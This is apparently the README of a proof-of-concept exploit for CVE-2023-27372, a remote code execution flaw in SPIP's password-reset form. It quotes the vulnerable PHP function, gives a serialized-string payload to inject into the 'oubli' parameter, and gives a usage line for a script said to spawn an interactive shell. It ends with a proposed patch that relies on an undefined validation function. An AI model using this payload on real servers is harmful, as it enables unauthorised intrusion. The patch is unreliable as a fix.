This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.
### This is a proof of concept CVE-2023-27372 SPIP RCE vulnerability.
It's a deserilzation flaw which exploits the dangerous use of #ENV tag during the reset password feature `(spip.php?page=spip_pass)` within `/ecrire/balise/formulaire_.php` Specifically this line:
1. Syntax: python3 exploit.py -u http(s)://url.com
```php
function protege_champ($texte){
if (is_array($texte))
$texte = array_map('protege_champ',$texte);
else {
// ne pas corrompre une valeur serialize
if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)
return $texte;
$texte = entites_html($texte);
$texte = str_replace("'","'",$texte);
}
return $texte;
}
```
The `protege_champ` function suffers from various flaws. The regular expression (RE) check used to validate the input is flawed and can be bypassed easily. The code calls the `unserialize()` function without proper validation, allowing the execution of arbitrary code. Manual exploitation can be performed extremely easily. For example, if we wanted to execute `phpinfo();` we can do:
```php
oubli=s:19:"<?phpinfo(); ?>";
```
If the server returns the expected out, it's vulnerable. How can we patch? Fairly simply actually. Below, I have wrote a basic patch:
```php
function protege_champ($texte) {
if (is_array($texte)) {
$texte = array_map('protege_champ', $texte);
} else {
if (!isValidInput($texte)) {
$texte = 'Malicious input detected';
} else {
$texte = entites_html($texte);
$texte = str_replace("'", "'", $texte);
}
}
return $texte;
}
```
The patched `protege_champ()` function includes input validation, sanitization, and handling of malicious input.
<a href=https://twitter.com/redboltsec>Twitter</a>
登录后查看神龙缓存的 POC 文件快照
登录查看